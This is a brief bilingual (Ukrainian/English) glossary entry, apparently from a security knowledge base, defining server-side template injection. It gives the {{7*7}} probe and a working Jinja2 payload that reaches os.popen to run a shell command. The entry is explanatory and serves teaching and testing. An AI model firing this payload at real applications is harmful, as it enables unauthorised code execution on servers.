KB / Глосарій / Шаблонна ін'єкція на стороні сервера

Шаблонна ін'єкція на стороні сервера

Server-Side Template Injection
Також: SSTI, template injection
web UA EN

SSTI occurs when user input is embedded in a template and executed by the template engine (Jinja2, Twig, FreeMarker).

Jinja2 probe: {{7*7}}49 confirms SSTI.

RCE payload (Jinja2):

{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
Вперше тут?
Новачок на Bastion?
Почни з гайду користувача.
Відкрити гайд →
?